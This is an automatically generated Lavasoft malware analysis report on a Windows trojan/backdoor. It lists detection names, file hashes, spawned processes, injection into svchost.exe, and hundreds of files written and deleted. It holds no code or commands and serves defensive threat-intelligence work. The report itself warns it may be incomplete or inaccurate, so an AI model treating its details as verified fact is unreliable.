Trojan.Win32.Inject.uwpn (Kaspersky), Gen:Variant.Kazy.626730 (B) (Emsisoft), Gen:Variant.Kazy.626730 (AdAware), Backdoor.Win32.Farfli.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: eb321fe9961ba299bafbba7448b04d29
SHA1: 4d714a0ca7db64d15e961a38e86ab03331902077
SHA256: c639c63acfbfa4d3621cc001303eb1c739262f4800efdced7763b539d06eb52a
SSDeep: 12288:Hnx74VxVQziArJhDbd ju2qNQ8w0E1Xg6tkN33wjGkcR:RuQz/N ju/u8USx3xR
Size: 541222 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company:
Created at: 2015-06-03 20:09:24
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
mofcomp.exe:2556
WindowsXP-KB968930-x86-ENG.exe:176
ngen.exe:3900
ngen.exe:3924
ngen.exe:3916
ngen.exe:3496
ngen.exe:3908
ngen.exe:3416
ngen.exe:3536
ngen.exe:3452
ngen.exe:3552
ngen.exe:3576
ngen.exe:3436
ngen.exe:3940
ngen.exe:3488
ngen.exe:3932
ngen.exe:3520
ngen.exe:3528
ngen.exe:3544
ngen.exe:3560
ngen.exe:3428
ngen.exe:3460
ngen.exe:3376
ngen.exe:3568
ngen.exe:3444
update.exe:1716
%original file name%.exe:464
PSCustomSetupUtil.exe:3592
PSCustomSetupUtil.exe:2596
PSCustomSetupUtil.exe:2900
PSCustomSetupUtil.exe:3776
PSCustomSetupUtil.exe:3612
PSCustomSetupUtil.exe:3736
PSCustomSetupUtil.exe:3164
PSCustomSetupUtil.exe:3008
PSCustomSetupUtil.exe:3660
PSCustomSetupUtil.exe:3124
PSCustomSetupUtil.exe:2744
PSCustomSetupUtil.exe:2968
PSCustomSetupUtil.exe:3080
PSCustomSetupUtil.exe:2620
PSCustomSetupUtil.exe:2768
PSCustomSetupUtil.exe:2876
PSCustomSetupUtil.exe:2720
PSCustomSetupUtil.exe:2924
PSCustomSetupUtil.exe:3708
PSCustomSetupUtil.exe:3800
PSCustomSetupUtil.exe:3056
PSCustomSetupUtil.exe:2836
PSCustomSetupUtil.exe:3644
PSCustomSetupUtil.exe:2680
PSCustomSetupUtil.exe:3032
PSCustomSetupUtil.exe:3684
PSSetupNativeUtils.exe:4084
mscorsvw.exe:2596
mscorsvw.exe:2432
mscorsvw.exe:3888
mscorsvw.exe:2344
mscorsvw.exe:2052
mscorsvw.exe:2056
mscorsvw.exe:1612
mscorsvw.exe:2248
mscorsvw.exe:504
mscorsvw.exe:2504
mscorsvw.exe:2116
mscorsvw.exe:2428
mscorsvw.exe:2440
mscorsvw.exe:580
mscorsvw.exe:3588
mscorsvw.exe:3400
mscorsvw.exe:3248
mscorsvw.exe:2316
mscorsvw.exe:3372
mscorsvw.exe:2168
mscorsvw.exe:372
mscorsvw.exe:2536
mscorsvw.exe:2160
mscorsvw.exe:516
wsmanhttpconfig.exe:2476
wsmanhttpconfig.exe:2536
The Trojan injects its code into the following process(es):
svchost.exe:640
svchost.exe:932
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process mofcomp.exe:2556 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\wbem\Logs\mofcomp.log (1814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (1 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (0 bytes)
The process WindowsXP-KB968930-x86-ENG.exe:176 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.utility.resources.dll (508 bytes)
C:\ea6d03fb84304f0031a48a\about_windows_powershell_ise.help.txt (6 bytes)
C:\ea6d03fb84304f0031a48a\about_logical_operators.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\about_wildcards.help.txt (3 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
C:\ea6d03fb84304f0031a48a\about_requires.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\about_methods.help.txt (6 bytes)
C:\ea6d03fb84304f0031a48a\about_signing.help.txt (12 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.wsman.management.resources.dll (13 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.wsman.management.dll-help.xml (8740 bytes)
C:\ea6d03fb84304f0031a48a\winrmprov.mof (789 bytes)
C:\ea6d03fb84304f0031a48a\update\update.inf (2457 bytes)
C:\ea6d03fb84304f0031a48a\about_automatic_variables.help.txt (14 bytes)
C:\ea6d03fb84304f0031a48a\about_throw.help.txt (5 bytes)
C:\ea6d03fb84304f0031a48a\pssetupnativeutils.exe (9 bytes)
C:\ea6d03fb84304f0031a48a\getevent.types.ps1xml (15 bytes)
C:\ea6d03fb84304f0031a48a\bitstransfer.format.ps1xml (16 bytes)
C:\ea6d03fb84304f0031a48a\about_parameters.help.txt (9 bytes)
C:\ea6d03fb84304f0031a48a\winrscmd.dll (2907 bytes)
C:\ea6d03fb84304f0031a48a\wsmsvc.dll (15909 bytes)
C:\ea6d03fb84304f0031a48a\about_types.ps1xml.help.txt (481 bytes)
C:\ea6d03fb84304f0031a48a\about_eventlogs.help.txt (5 bytes)
C:\ea6d03fb84304f0031a48a\spmsg.dll (495 bytes)
C:\ea6d03fb84304f0031a48a\about_ws-management_cmdlets.help.txt (405 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.backgroundintelligenttransfer.management.dll (1537 bytes)
C:\$Directory (800 bytes)
C:\ea6d03fb84304f0031a48a\system.management.automation.dll-help.xml (16567 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.wsman.management.dll (5010 bytes)
C:\ea6d03fb84304f0031a48a\about_command_syntax.help.txt (5 bytes)
C:\ea6d03fb84304f0031a48a\about_format.ps1xml.help.txt (17 bytes)
C:\ea6d03fb84304f0031a48a\about_command_precedence.help.txt (8 bytes)
C:\ea6d03fb84304f0031a48a\pwrshmsg.dll (4 bytes)
C:\ea6d03fb84304f0031a48a\update\kb968930xp.cat (512 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
C:\ea6d03fb84304f0031a48a\wsmres.dll (6164 bytes)
C:\ea6d03fb84304f0031a48a\about_comment_based_help.help.txt (595 bytes)
C:\ea6d03fb84304f0031a48a\about_assignment_operators.help.txt (379 bytes)
C:\ea6d03fb84304f0031a48a\about_quoting_rules.help.txt (659 bytes)
C:\ea6d03fb84304f0031a48a\pwrshsip.dll (24 bytes)
C:\ea6d03fb84304f0031a48a\wsmprovhost.exe (657 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.utility.dll (9684 bytes)
C:\ea6d03fb84304f0031a48a\about_split.help.txt (10 bytes)
C:\ea6d03fb84304f0031a48a\about_variables.help.txt (6 bytes)
C:\ea6d03fb84304f0031a48a\about_providers.help.txt (59 bytes)
C:\ea6d03fb84304f0031a48a\winrssrv.dll (12 bytes)
C:\ea6d03fb84304f0031a48a\about_hash_tables.help.txt (6 bytes)
C:\ea6d03fb84304f0031a48a\about_language_keywords.help.txt (11 bytes)
C:\ea6d03fb84304f0031a48a\wsmauto.dll (1842 bytes)
C:\ea6d03fb84304f0031a48a\about_functions_advanced_methods.help.txt (9 bytes)
C:\ea6d03fb84304f0031a48a\eventforwarding.adm (2 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
C:\ea6d03fb84304f0031a48a\winrm.cmd (35 bytes)
C:\ea6d03fb84304f0031a48a\about_prompts.help.txt (7 bytes)
C:\ea6d03fb84304f0031a48a\about_script_internationalization.help.txt (9 bytes)
C:\ea6d03fb84304f0031a48a\about_trap.help.txt (10 bytes)
C:\ea6d03fb84304f0031a48a\powershellcore.format.ps1xml (1492 bytes)
C:\ea6d03fb84304f0031a48a\winrmprov.dll (591 bytes)
C:\ea6d03fb84304f0031a48a\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
C:\ea6d03fb84304f0031a48a\about_locations.help.txt (794 bytes)
C:\ea6d03fb84304f0031a48a\about_operators.help.txt (770 bytes)
C:\ea6d03fb84304f0031a48a\about_remote_output.help.txt (887 bytes)
C:\ea6d03fb84304f0031a48a\about_type_operators.help.txt (5 bytes)
C:\ea6d03fb84304f0031a48a\about_redirection.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\spupdsvc.exe (287 bytes)
C:\ea6d03fb84304f0031a48a\about_transactions.help.txt (1011 bytes)
C:\ea6d03fb84304f0031a48a\about_functions_cmdletbindingattribute.help.txt (3 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.wsman.runtime.dll (33 bytes)
C:\ea6d03fb84304f0031a48a\winrm.ini (1956 bytes)
C:\ea6d03fb84304f0031a48a\update\update.ver (14 bytes)
C:\ea6d03fb84304f0031a48a\about_join.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\about_continue.help.txt (1 bytes)
C:\ea6d03fb84304f0031a48a\about_preference_variables.help.txt (37 bytes)
C:\ea6d03fb84304f0031a48a\about_modules.help.txt (13 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
C:\ea6d03fb84304f0031a48a\help.format.ps1xml (3947 bytes)
C:\ea6d03fb84304f0031a48a\update\update.exe (10748 bytes)
C:\ea6d03fb84304f0031a48a\spuninst.exe (3787 bytes)
C:\ea6d03fb84304f0031a48a\pwrshplugin.dll (802 bytes)
C:\ea6d03fb84304f0031a48a\windowspowershellhelp.chm (26041 bytes)
C:\ea6d03fb84304f0031a48a\system.management.automation.resources.dll (3153 bytes)
C:\ea6d03fb84304f0031a48a\about_jobs.help.txt (12 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.diagnostics.dll (998 bytes)
C:\ea6d03fb84304f0031a48a\update\eula.txt (586 bytes)
C:\ea6d03fb84304f0031a48a\about_functions_advanced.help.txt (3 bytes)
C:\ea6d03fb84304f0031a48a\about_pssession_details.help.txt (9 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
C:\ea6d03fb84304f0031a48a\about_do.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\about_special_characters.help.txt (3 bytes)
C:\ea6d03fb84304f0031a48a\about_line_editing.help.txt (1 bytes)
C:\ea6d03fb84304f0031a48a\winrs.exe (1154 bytes)
C:\ea6d03fb84304f0031a48a\about_return.help.txt (3 bytes)
C:\ea6d03fb84304f0031a48a\about_commonparameters.help.txt (12 bytes)
C:\ea6d03fb84304f0031a48a\about_properties.help.txt (7 bytes)
C:\ea6d03fb84304f0031a48a\about_while.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\about_if.help.txt (3 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.editor.resources.dll (562 bytes)
C:\ea6d03fb84304f0031a48a\powershell.exe (7339 bytes)
C:\ea6d03fb84304f0031a48a\dotnettypes.format.ps1xml (266 bytes)
C:\ea6d03fb84304f0031a48a\about_break.help.txt (792 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
C:\ea6d03fb84304f0031a48a\about_remote_jobs.help.txt (13 bytes)
C:\ea6d03fb84304f0031a48a\wsmtxt.xsl (2 bytes)
C:\ea6d03fb84304f0031a48a\winrm.vbs (2727 bytes)
C:\ea6d03fb84304f0031a48a\about_scripts.help.txt (12 bytes)
C:\ea6d03fb84304f0031a48a\update\updspapi.dll (5940 bytes)
C:\ea6d03fb84304f0031a48a\about_regular_expressions.help.txt (5 bytes)
C:\ea6d03fb84304f0031a48a\default.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\about_environment_variables.help.txt (417 bytes)
C:\ea6d03fb84304f0031a48a\update\spcustom.dll (23 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.management.resources.dll (508 bytes)
C:\ea6d03fb84304f0031a48a\about_functions_advanced_parameters.help.txt (962 bytes)
C:\ea6d03fb84304f0031a48a\about_profiles.help.txt (457 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.gpowershell.dll (9738 bytes)
C:\ea6d03fb84304f0031a48a\importallmodules.psd1 (438 bytes)
C:\ea6d03fb84304f0031a48a\about_parsing.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.management.dll (3386 bytes)
C:\ea6d03fb84304f0031a48a\about_core_commands.help.txt (221 bytes)
C:\ea6d03fb84304f0031a48a\about_remote_faq.help.txt (775 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.consolehost.dll (3118 bytes)
C:\ea6d03fb84304f0031a48a\about_pssessions.help.txt (9 bytes)
C:\ea6d03fb84304f0031a48a\wsmwmipl.dll (2816 bytes)
C:\ea6d03fb84304f0031a48a\winrsmgr.dll (2 bytes)
C:\ea6d03fb84304f0031a48a\wsmpty.xsl (1 bytes)
C:\ea6d03fb84304f0031a48a\about_try_catch_finally.help.txt (7 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.security.resources.dll (9 bytes)
C:\ea6d03fb84304f0031a48a\about_foreach.help.txt (10 bytes)
C:\ea6d03fb84304f0031a48a\about_session_configurations.help.txt (276 bytes)
C:\ea6d03fb84304f0031a48a\about_history.help.txt (3 bytes)
C:\ea6d03fb84304f0031a48a\about_for.help.txt (146 bytes)
C:\ea6d03fb84304f0031a48a\wsmauto.mof (4 bytes)
C:\ea6d03fb84304f0031a48a\about_path_syntax.help.txt (5 bytes)
C:\ea6d03fb84304f0031a48a\about_objects.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
C:\ea6d03fb84304f0031a48a\system.management.automation.dll (38414 bytes)
C:\ea6d03fb84304f0031a48a\powershelltrace.format.ps1xml (344 bytes)
C:\ea6d03fb84304f0031a48a\about_arithmetic_operators.help.txt (168 bytes)
C:\ea6d03fb84304f0031a48a\about_execution_policies.help.txt (13 bytes)
C:\ea6d03fb84304f0031a48a\bitstransfer.psd1 (950 bytes)
C:\ea6d03fb84304f0031a48a\powershell_ise.resources.dll (4 bytes)
C:\ea6d03fb84304f0031a48a\about_job_details.help.txt (824 bytes)
C:\ea6d03fb84304f0031a48a\update (4 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.graphicalhost.dll (4408 bytes)
C:\ea6d03fb84304f0031a48a\windowsremotemanagement.adm (574 bytes)
C:\ea6d03fb84304f0031a48a\about_pssnapins.help.txt (6 bytes)
C:\ea6d03fb84304f0031a48a\about_reserved_words.help.txt (1 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.editor.dll (14450 bytes)
C:\ea6d03fb84304f0031a48a\powershell.exe.mui (10 bytes)
C:\ea6d03fb84304f0031a48a\about_data_sections.help.txt (5 bytes)
C:\ea6d03fb84304f0031a48a\about_bits_cmdlets.help.txt (7 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
C:\ea6d03fb84304f0031a48a\wevtfwd.dll (3351 bytes)
C:\ea6d03fb84304f0031a48a\about_escape_characters.help.txt (2 bytes)
C:\ea6d03fb84304f0031a48a\about_functions.help.txt (586 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
C:\ea6d03fb84304f0031a48a\types.ps1xml (2510 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.consolehost.resources.dll (778 bytes)
C:\ea6d03fb84304f0031a48a\pspluginwkr.dll (1756 bytes)
C:\ea6d03fb84304f0031a48a\about_ref.help.txt (1 bytes)
C:\ea6d03fb84304f0031a48a\registry.format.ps1xml (20 bytes)
C:\ea6d03fb84304f0031a48a\filesystem.format.ps1xml (133 bytes)
C:\ea6d03fb84304f0031a48a\about_windows_powershell_2.0.help.txt (453 bytes)
C:\ea6d03fb84304f0031a48a\diagnostics.format.ps1xml (590 bytes)
C:\ea6d03fb84304f0031a48a\wtrinstaller.ico (4803 bytes)
C:\ea6d03fb84304f0031a48a\about_scopes.help.txt (76 bytes)
C:\ea6d03fb84304f0031a48a\certificate.format.ps1xml (155 bytes)
C:\ea6d03fb84304f0031a48a\about_remote_requirements.help.txt (6 bytes)
C:\ea6d03fb84304f0031a48a\about_comparison_operators.help.txt (11 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.gpowershell.resources.dll (408 bytes)
C:\ea6d03fb84304f0031a48a\about_pipelines.help.txt (411 bytes)
C:\ea6d03fb84304f0031a48a\wsmanhttpconfig.exe (3009 bytes)
C:\ea6d03fb84304f0031a48a\about_aliases.help.txt (6 bytes)
C:\ea6d03fb84304f0031a48a\about_switch.help.txt (489 bytes)
C:\ea6d03fb84304f0031a48a\about_arrays.help.txt (8 bytes)
C:\ea6d03fb84304f0031a48a\about_wmi_cmdlets.help.txt (8 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.security.dll-help.xml (1797 bytes)
C:\ea6d03fb84304f0031a48a\about_remote.help.txt (7 bytes)
C:\ea6d03fb84304f0031a48a\powershell_ise.exe (2526 bytes)
C:\ea6d03fb84304f0031a48a\windowsremoteshell.adm (12 bytes)
C:\ea6d03fb84304f0031a48a\$shtdwn$.req (788 bytes)
C:\ea6d03fb84304f0031a48a\about_debuggers.help.txt (21 bytes)
C:\ea6d03fb84304f0031a48a\wsmplpxy.dll (603 bytes)
C:\ea6d03fb84304f0031a48a\winrshost.exe (22 bytes)
C:\ea6d03fb84304f0031a48a\about_remote_troubleshooting.help.txt (146 bytes)
C:\ea6d03fb84304f0031a48a\profile.ps1 (772 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.security.dll (1145 bytes)
C:\ea6d03fb84304f0031a48a\pscustomsetuputil.exe (316 bytes)
C:\ea6d03fb84304f0031a48a\wsman.format.ps1xml (837 bytes)
C:\ea6d03fb84304f0031a48a\about_script_blocks.help.txt (3 bytes)
The Trojan deletes the following file(s):
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.utility.resources.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.wsman.management.dll-help.xml (0 bytes)
C:\ea6d03fb84304f0031a48a\about_logical_operators.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_wildcards.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_requires.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_methods.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_signing.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.wsman.management.resources.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\winrmprov.mof (0 bytes)
C:\ea6d03fb84304f0031a48a\update\update.inf (0 bytes)
C:\ea6d03fb84304f0031a48a\about_automatic_variables.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_throw.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_foreach.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\getevent.types.ps1xml (0 bytes)
C:\ea6d03fb84304f0031a48a\about_if.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_parameters.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\winrscmd.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_windows_powershell_ise.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_types.ps1xml.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_eventlogs.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_command_syntax.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_ws-management_cmdlets.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.backgroundintelligenttransfer.management.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\system.management.automation.dll-help.xml (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.wsman.management.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_format.ps1xml.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_command_precedence.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\pwrshmsg.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\update\kb968930xp.cat (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.graphicalhost.resources.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\wsmres.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_comment_based_help.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_assignment_operators.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_quoting_rules.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a (0 bytes)
C:\ea6d03fb84304f0031a48a\default.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\wsmprovhost.exe (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.utility.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_split.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_while.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_providers.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\winrssrv.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_scripts.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_language_keywords.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_pssession_details.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\wsmpty.xsl (0 bytes)
C:\ea6d03fb84304f0031a48a\eventforwarding.adm (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.consolehost.dll-help.xml (0 bytes)
C:\ea6d03fb84304f0031a48a\winrm.cmd (0 bytes)
C:\ea6d03fb84304f0031a48a\about_prompts.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_script_internationalization.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_trap.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\powershellcore.format.ps1xml (0 bytes)
C:\ea6d03fb84304f0031a48a\about_comparison_operators.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\compiledcomposition.microsoft.powershell.gpowershell.dll (0 bytes)
C:\_537593_ (0 bytes)
C:\ea6d03fb84304f0031a48a\about_operators.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_script_blocks.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_redirection.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\spupdsvc.exe (0 bytes)
C:\ea6d03fb84304f0031a48a\about_transactions.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_functions_cmdletbindingattribute.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.wsman.runtime.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\winrm.ini (0 bytes)
C:\ea6d03fb84304f0031a48a\update\update.ver (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.backgroundintelligenttransfer.management.resources.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\powershell_ise.exe (0 bytes)
C:\ea6d03fb84304f0031a48a\about_continue.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_preference_variables.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_modules.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\windowsremoteshell.adm (0 bytes)
C:\ea6d03fb84304f0031a48a\about_environment_variables.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\system.management.automation.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\update\update.exe (0 bytes)
C:\ea6d03fb84304f0031a48a\about_return.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.diagnostics.dll-help.xml (0 bytes)
C:\ea6d03fb84304f0031a48a\system.management.automation.resources.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_jobs.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.management.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\update\eula.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_arithmetic_operators.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.gpowershell.resources.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_do.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_special_characters.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\pssetupnativeutils.exe (0 bytes)
C:\ea6d03fb84304f0031a48a\about_line_editing.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\certificate.format.ps1xml (0 bytes)
C:\ea6d03fb84304f0031a48a\spuninst.exe (0 bytes)
C:\ea6d03fb84304f0031a48a\about_commonparameters.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\wsmsvc.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_variables.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\bitstransfer.format.ps1xml (0 bytes)
C:\ea6d03fb84304f0031a48a\pwrshsip.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.editor.resources.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\powershell.exe (0 bytes)
C:\ea6d03fb84304f0031a48a\dotnettypes.format.ps1xml (0 bytes)
C:\ea6d03fb84304f0031a48a\about_break.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.diagnostics.resources.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_remote_jobs.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\wsmtxt.xsl (0 bytes)
C:\ea6d03fb84304f0031a48a\winrm.vbs (0 bytes)
C:\ea6d03fb84304f0031a48a\about_hash_tables.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\update\updspapi.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_regular_expressions.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_properties.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\update\spcustom.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.management.resources.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_functions_advanced_parameters.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_profiles.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.gpowershell.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_try_catch_finally.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_parsing.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.diagnostics.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_core_commands.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_remote_faq.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\windowspowershellhelp.chm (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.consolehost.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_pssessions.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_remote.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\winrsmgr.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\importallmodules.psd1 (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.security.resources.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.backgroundintelligenttransfer.management.dll-help.xml (0 bytes)
C:\ea6d03fb84304f0031a48a\about_session_configurations.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_history.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_for.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\wsmauto.mof (0 bytes)
C:\ea6d03fb84304f0031a48a\about_path_syntax.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_objects.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\help.format.ps1xml (0 bytes)
C:\ea6d03fb84304f0031a48a\powershelltrace.format.ps1xml (0 bytes)
C:\ea6d03fb84304f0031a48a\about_functions_advanced.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_execution_policies.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\bitstransfer.psd1 (0 bytes)
C:\ea6d03fb84304f0031a48a\powershell_ise.resources.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_debuggers.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\update (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.backgroundintelligenttransfer.management.interop.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\windowsremotemanagement.adm (0 bytes)
C:\ea6d03fb84304f0031a48a\about_pssnapins.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_reserved_words.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_functions_advanced_methods.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_functions.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_join.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_bits_cmdlets.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_arrays.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\wsmauto.dll (0 bytes)
